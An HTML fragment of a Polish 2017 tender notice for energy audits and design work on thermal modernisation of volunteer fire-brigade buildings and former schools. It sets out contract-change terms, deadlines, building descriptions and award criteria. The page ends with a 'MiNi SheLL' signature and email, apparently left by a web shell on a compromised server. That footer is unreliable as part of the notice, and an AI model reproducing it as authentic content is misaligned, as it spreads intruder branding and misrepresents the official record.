              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty (w części dotyczącej przedmiotu umowy, terminów oraz wynagrodzenia), na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:
1) zajdzie konieczność zmiany terminu wykonania przedmiotu zamówienia na skutek:
a) działania siły wyższej,
b) pomimo wystąpienia Wykonawcy lub Zamawiającego o uzgodnienie, wydanie decyzji administracyjnej lub warunków technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie ustawowo przewidzianym dla danej czynności organ administracji publicznej lub inna upoważniona instytucja nie wydała stosownego dokumentu lub decyzji  tylko w zakresie przedłużenia terminu realizacji zamówienia i tylko o okres trwania tych czynności organów administracji publicznej lub instytucji przekraczający termin ustawowo przewidziany dla danej czynności
c) konieczności ponowienia uzgodnień lub opiniowania dokumentacji objętej przedmiotem zamówienia
2) zmiany zasad finansowania zamówienia,
3) zmiany uwarunkowań prawnych i formalnych realizacji Kontraktu, spowodowanych działaniem osób trzecich,
4) zaistnienia konieczności zrealizowania przedmiotu zamówienia w innym niż pierwotnie założono zakresie, gdyby zastosowanie przewidzianego zakresu groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy - w takim przypadku wykonawca może wnieść o zmianę zakresu, zaproponowanie rozwiązań o równoważnych lub lepszych parametrach.
5) zmiany wynagrodzenia wykonawcy (ceny) o kwotę wynikającą ze zmienionych stawek podatku VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.
6) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
7) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
7. W przypadku określonym w ust.  6 pkt 6) zmiana stawek jest podstawą do zmiany wynagrodzenia od dnia obowiązywania nowych stawek. W celu wprowadzenia zmian w tym zakresie strony zawrą stosowne porozumienie obowiązujące od dnia wejście w życie przepisów.
8. W przypadkach określonym w ust. 6 pkt 6) i 7) zmiana wynagrodzenia będzie możliwa jeśli Wykonawca wystąpi z wnioskiem o zmianę umowy, który będzie zawierał szczegółowe wyliczenie dotyczące wpływu zmiany na wykonanie zamówienia, a zmiany te będą potwierdzały stosowne dokumenty.
9. W przypadku uznania, iż przedłożone dokumenty potwierdzają spełnienie przesłanek do zwiększenia wynagrodzenia strony zawrą stosowne porozumienie, które wejdzie w życie od daty zmian przepisów prawnych pociągających za sobą obowiązek zmiany wysokości minimalnego wynagrodzenia czy zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Pod warunkiem, iż zmiany te Wykonawca wprowadził zgodnie z obowiązującym prawem i udowodni, iż to uczynił stosownymi dokumentami. W przypadku wprowadzenia zmian w terminie późniejszym, wynagrodzenie określone w niniejszej umowie zostanie zmienione od daty wprowadzenia zmian przez Wykonawcę w oparciu o przedstawione dowody.
10. Zmiana wynagrodzenia z powodów określonych w ust. 6 pkt 6) i 7) nie może być wyższa od zmian wynagrodzenia wynikających z przepisów prawa pociągających te zmiany.
11. Za okoliczności siły wyższej uznaje się między innymi: pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich powstające poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec.
12. Zaistnienie siły wyższej powinno być udokumentowane przez Stronę powołującą się na nią.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/01/2017, godzina: 10:15,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              oferty powinny być sporządzone w języku polskim <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Felicjanowie, Zaborowie oraz budynku po byłej szkole podstawowej w m. Wola Przedmiejska <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OSP  w Felicjanowie, Felicjanów 32a, dz. nr ewid. 210/3, 211, obręb Felicjanów
Strażnica w Felicjanowie składa się z połączonych budynków: głównego, pomocniczego i garażowego. Wszystkie części jednokondygnacyjne, niepodpiwniczone. Budynek główny z nieużytkowym poddaszem, dach dwuspadowy z płyt azbestocementowych na drewnianej więźbie płatwiowej. Nad garażem i budynkiem pomocniczym stropodachy o niewielkim spadku, kryte papą. W części pomocniczej znajduje się jedno pomieszczenie oraz magazyn, a w części głównej sala wielofunkcyjna o pow. 123 m2. W budynku garażowym wydzielono dwa garaże. Najstarszy budynek pomocniczy wzniesiono najprawdopodobniej w latach 20. Podwalina kamienna, ściany z kamienia wapiennego spajanego gliną, naroża i otwory wymurowane z cegły palonej. Grubość ściany zewnętrznej 49 cm. Na podłodze polepa gliniana. Od frontu budynek otynkowany, elewacja w kolorze białym, na ścianach tylnej i bocznej odsłonięty kamień. Widoczne uzupełnienia ścian z pustaków ceramicznych. Stolarka okienna z PVC. W budynku głównym ściany o gr. 47 cm z kamienia wapiennego na fundamentach z bloczków betonowych. Narożniki i komin w części południowej wymurowane z cegły palonej. Dach w konstrukcji drewnianej belkowej. Część pierwotnych otworów zamurowana, nowe drzwi i stolarka okienna z PVC. Na podłodze wylewka betonowa. Budynek garażowy powojenny. Fundamenty betonowe, ściany z pustaków ceramicznych o gr. 39 cm. Stropodach z płyt betonowych na belkach stalowych. Posadzka betonowa. Z wyjątkiem jednego okna w ścianie wschodniej stolarka okienna nowa, z PVC. Bramy garażowe stare, wykonane z desek obitych blachą. Jedynym źródłem ciepła w strażnicy jest wolnostojący piecyk na węgiel/drewno w części garażowej. 
OSP w Zaborowie, Zaborów 25, dz. nr ewid. 77, obręb Zaborów
Siedziba OSP w Zaborowie została wzniesiona na początku lat 30. Przez wiele lat budynek służył jako szkoła podstawowa. W latach 1958-72 budynek przebudowano: poszerzono go i wydłużono o ok. 5 m, całość przykryto nowym dachem.
Budynek jednokondygnacyjny, niepodpiwniczony, z nieużytkowym poddaszem. Fundamenty betonowe, ściany fundamentowe z cegły pełnej. Ściany zewnętrzne z kamienia wapiennego, o grubości 44 cm. Do budowy ścian użyto zarówno kamienia nieobrobionego, jak i ciosanego w cegłę. Budynek otynkowany. Nad południową częścią strażnicy strop drewniany, belkowy, od spodu wykończony tynkiem na deskowaniu. Nad garażem, kuchnią i pomieszczeniem gospodarczym strop żelbetowy. Dach dwuspadowy na więźbie płatwiowo-kleszczowej. Pokrycie dachu stanowi papa na pełnym deskowaniu. W garażu, kuchni i pomieszczeniu gospodarczym posadzki betonowe. W reszcie pomieszczeń podłoga z desek na legarach na słupkach na podsypce z piasku. Stolarka okienna wymieniona w latach 90-tych, z PVC. Drzwi i brama garażowa drewniane. Pomieszczenia ogrzewane za pomocą piecyka wolnostojącego na węgiel/drewno. 

Budynek po byłej szkole w m .Wola Przedmiejska 
Budynek niepodpiwniczony, dwukondygnacyjny z poddaszem nieużytkowym. Technologia budynku - tradycyjna ( cegła ).  Ściany nieocieplone. Stropy nieocieplone. Okna mieszanego typu.   Kubatura budynku: 663m3. 
Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.:
	Wymianę pokrycia dachowego
	Wymiana konstrukcji dachu 
	Ocieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. 
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania kamienia wapiennego  na elewacji frontowej )
Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Zabezpieczenie należytego wykonania umowy </td><td>20</td></tr><tr><td>Okres gwarancji na który Wykonawca przedłuża okres  rękojmi za wady </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Człopach, Górach oraz  budynku byłej kaplicy  w Rożniatowie .<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OSP  w Człopach, Człopy 39, dz. nr ewid. 268, obręb Człopy .
Budynek parterowy, częściowo podpiwniczony, kryty dwuspadowym dachem. Konstrukcja dachu z wiązarów kratowych deskowych oraz krokwi nad niższą częścią budynku. Pokrycie z płyt azbestocementowych. Fundamenty betonowe. Ściany zewnętrzne częściowo z cegły wapiennej pełnej (najstarsze fragmenty ścian: frontowej i bocznej o gr. 70 cm), częściowo z pustaka żużlowego, o gr. 41 cm. Elewacje otynkowane. Posadzki betonowe, w sali wielofunkcyjnej podłoga z desek na legarach na słupkach na podsypce z piasku. W sali, przedsionku, pom. OSP i garażu sufity, w pom. zapleczowym i magazynie odsłonięte krokwie. W ścianie frontowej nowe aluminiowe drzwi wejściowe, brama garażowa i stolarka okienna z PVC. Pozostała stolarka drewniana.

OSP  w Górach, Góry 25a, dz. nr ewid. 615/1, 616, 621/1, obręb Góry 
Strażnica w Górach została zbudowana w latach 1969-72. Budynek złożony z dwóch przenikających się brył o różnych wysokościach. Strażnica jednokondygnacyjna, niepodpiwniczona, kryta stropodachem Fundamenty betonowe, ściany zewnętrzne o gr. 40 cm z pustaków cementowo-piaskowych wyrabianych na budowie, otynkowane. Strop ceramiczny typu Kleina na belkach stalowych. Posadzki betonowe, w sali wielofunkcyjnej podłoga z desek na legarach na podsypce z piasku. Stolarka okienna z PVC starego typu, w garażu i pomieszczeniu OSP stara ślusarka okienna metalowa. 
W strażnicy znajduje się przedsionek, sala wielofunkcyjna o pow. 87 m2, pomieszczenie OSP i garaż. Ogrzewanie za pomocą piecyka wolnostojącego na węgiel/drewno. 

Budynek kaplicy w Rożniatowie, Rożniatów 10, dz. nr ewid. 93, obręb Rożniatów - 
Budynek wzniesiony w 1982 roku. Przez wiele lat pełnił funkcję szkoły podstawowej.
Budynek jednokondygnacyjny, podpiwniczony. Stropodach jednospadowy, prawdopodobnie o konstrukcji drewnianej, kryty blachą falistą. Fundament betonowy, ściany zewnętrzne o gr. 56 cm. Ściany piwnicy z pustaków żużlowych, ściany parteru warstwowe: pustak ceramiczny/pustka powietrzna/pustak ceramiczny. Stropy z płyt kanałowych o gr. 37 cm. Posadzki parteru  lastryko, w piwnicy  wylewka betonowa. Nowa stolarka okienna i drzwi wejściowe z PVC.  Instalacja centralnego ogrzewania niesprawna. 

Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.
	 Docieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. . 
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania kamienia wapiennego  na elewacji frontowej  )
	Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Zabezpieczenie należytego wykonania umowy </td><td>20</td></tr><tr><td>Okres gwarancji na który Wykonawca przedłuża okres  rękojmi za wady </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Orzeszkowie, Skotnikach i Woli Przedmiejskiej.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OSP w Orzeszkowie -  Orzeszków 2, dz. nr ewid. 77, obręb Orzeszków
Budynek wzniesiony na początku lat 30. W roku 1962 gruntownie odremontowany. W latach 70. strażnica rozbudowywana. W latach 70. i 80. przeprowadzano prace remontowe.
Budynek jednokondygnacyjny, niepodpiwniczony, kryty dachem dwuspadowym z płyt azbestocementowych na więźbie płatwiowo-krokwiowej. Dach nad salą prawdopodobnie na wiązarach deskowych. Fundamenty betonowe. Ściany zewnętrzne z cegły cementowej w części głównej (60 cm grubości), ciosanego wapienia w garażu (48 cm grubości), i pustaka żużlowego w dobudowanym aneksie sali (29 cm grubości).. Posadzka w sali wielofunkcyjnej: deski na legarach na wylewce, w pozostałych pomieszczeniach wylewka, w części zachodniej (dawny sklep)  lastryko. Nad salą sufit z płyt drewnopochodnych, nad garażem i dawnym sklepem strop ceramiczny typu Kleina na belkach stalowych. Drzwi i brama garażowa drewniane, stolarka okienna z PVC starego typu.

OSP  w Skotnikach - Skotniki 6a, dz. nr ewid. 177/1, obręb Skotniki 
Budynek jednokondygnacyjny, zbudowany w technologii murowanej. Ściany zewnętrzne części garażowej z pustaków cementowych, o gr. 25 cm. Ściana frontowa garażu ze schodkowa attyka. Ściany zewnętrzne części głównej z pustaków żużlowych. Górne fragmenty ścian szczytowych z pustaków ceramicznych. Budynek niepodpiwniczony. Garaż i przybudówka kryte stropodachami z płyt betonowych na belkach stalowych, nad budynkiem głównym dach dwuspadowy z płyt eternitowych na kratownicy z desek. Stolarka okienna w większości drewniana. Ogrzewanie za pomocą piecyka wolnostojącego na węgiel/drewno
OSP w Woli Przedmiejskiej - Wola Przedmiejska 18a, dz. nr ewid. 103/1, obręb Wola Przedmiejska
Strażnica wzniesiona w 1975 r., rozbudowana w latach 1984-85. 
Budynek jednokondygnacyjny, z nieużytkowym poddaszem, niepodpiwniczony. Fundamenty betonowe, ściany zewnętrzne o grubości 41 cm z pustaków żużlowych, otynkowane, malowane na biało. Pomieszczenia przykryte stropem z płyt żelbetowych opartych na belkach stalowych dwuteowych. Dach z płyt azbestocementowych opartych na drewnianej więźbie płatwiowo-kleszczowej. Na podłodze wylewka betonowa, w sali wielofunkcyjnej gres. Stolarka okienna z PCV, z wyjątkiem okien garażu (ślusarka metalowa) i pomieszczenia OSP (drewno). Okna, drzwi wejściowe i bramę garażową wymieniano ok. 10 lat temu.
Budynek składa się z dwóch części: ogólnej i garażowej. W części ogólnej znajduje się przedsionek, kuchnia, toaleta, pomieszczenie OSP oraz duża sala wielofunkcyjna (86 m2) ze sceną, w której organizowane są imprezy. Część garażowa, dostępna z zewnątrz oraz z sali wielofunkcyjnej, składa się z jednego pomieszczenia. Posadzka w części ogólnej jest wyniesiona ok. 58 cm nad poziom terenu, podczas gdy posadzka garażu znajduje się na poziomie terenu.
Budynek wyposażony w instalację wodociągową. Woda ogrzewana za pomocą elektrycznego ogrzewacza. Budynek nie jest podłączony do kanalizacji i nie posiada zbiornika asenizacyjnego. Instalacja elektryczna starego typu  aluminiowa. Budynek ogrzewany dwoma piecykami wolnostojącymi na węgiel/drewno. Większość pomieszczeń wyposażono w instalację wentylacji grawitacyjnej. Strażnica posiada syrenę alarmową.
Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.
	 Docieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. .
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania okładziny z kamienia wapiennego  elewacji frontowej  )
Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>Zabezpieczenie należytego wykonania umowy </td><td>20</td></tr><tr><td>Okres gwarancji na który Wykonawca przedłuża okres  rękojmi za wady </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com